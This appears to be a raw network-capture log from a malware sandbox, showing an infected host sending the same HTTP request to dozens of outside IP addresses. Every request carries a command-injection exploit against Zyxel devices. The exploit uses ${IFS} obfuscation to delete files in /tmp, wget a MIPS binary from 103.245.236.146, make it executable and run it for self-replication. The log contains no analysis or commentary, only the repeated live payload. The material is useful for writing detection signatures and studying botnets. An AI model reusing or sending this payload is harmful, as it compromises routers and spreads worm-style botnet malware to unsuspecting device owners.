                                                        Jan 28, 2024 10:13:03.605675936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7009192.168.2.1454518217.123.65.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605710030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7010192.168.2.1437460157.189.224.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605732918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7011192.168.2.1432906152.160.98.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605778933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7012192.168.2.143431870.196.61.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605814934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7013192.168.2.1439078190.109.136.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605874062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7014192.168.2.1439332137.173.78.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605911970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7015192.168.2.143320645.186.203.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605948925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7016192.168.2.1438650176.246.43.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605989933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7017192.168.2.1451534176.108.183.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606019020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7018192.168.2.1455796166.62.242.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606084108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7019192.168.2.144883825.38.179.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606106997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7020192.168.2.1434102217.40.246.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606158018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7021192.168.2.1457148196.217.56.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606201887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7022192.168.2.1439092184.59.76.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606237888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7023192.168.2.1447704119.196.223.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606271982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7024192.168.2.143900824.149.176.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606323004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7025192.168.2.144792864.133.164.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606375933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7026192.168.2.1437088136.6.37.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606414080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7027192.168.2.145411242.62.17.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606436014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7028192.168.2.1443668190.137.178.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606502056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7029192.168.2.1438356152.43.170.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606525898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7030192.168.2.1443700105.71.159.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606594086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7031192.168.2.14449609.125.110.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606614113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7032192.168.2.1441416147.231.14.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606661081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7033192.168.2.1446066119.178.83.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606703043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7034192.168.2.14461488.210.66.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606731892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7035192.168.2.1436828162.140.40.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606776953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7036192.168.2.1434120166.181.136.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606822014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7037192.168.2.1432926219.13.32.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606842041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7038192.168.2.1446806218.204.66.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606880903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7039192.168.2.1453246108.141.61.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606904984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7040192.168.2.143423642.247.251.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606949091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7041192.168.2.145759461.103.8.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.606991053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7042192.168.2.1439046133.6.203.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607032061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7043192.168.2.1449138211.60.46.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607069016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7044192.168.2.144927246.42.151.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607115030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7045192.168.2.1452214169.184.23.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607170105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7046192.168.2.145248246.106.138.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607203960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7047192.168.2.145716095.230.163.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607243061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7048192.168.2.1453548100.58.88.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607286930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7049192.168.2.145283071.69.129.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607342005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7050192.168.2.1433566174.70.240.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607368946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7051192.168.2.145439062.162.227.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607419968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7052192.168.2.143858273.146.79.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607470989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7053192.168.2.14452649.232.229.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607497931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7054192.168.2.1447508212.81.124.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607553959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7055192.168.2.143653865.234.216.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607589960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7056192.168.2.145105888.184.231.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607618093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7057192.168.2.145492257.206.174.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607649088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7058192.168.2.145403663.4.252.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607685089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7059192.168.2.1449626219.112.169.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607748032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7060192.168.2.1434156142.247.159.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607784033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7061192.168.2.144494646.122.205.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607829094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7062192.168.2.143794243.173.235.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607860088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7063192.168.2.1448776116.182.134.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607922077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7064192.168.2.144095243.24.64.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607960939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7065192.168.2.143778268.87.34.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.607996941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7066192.168.2.143489249.80.246.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608047962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7067192.168.2.1454208121.218.2.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608084917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7068192.168.2.1444280121.37.174.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608117104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7069192.168.2.1435334220.64.35.121443
                                                        TimestampBytes transferredDirectionData
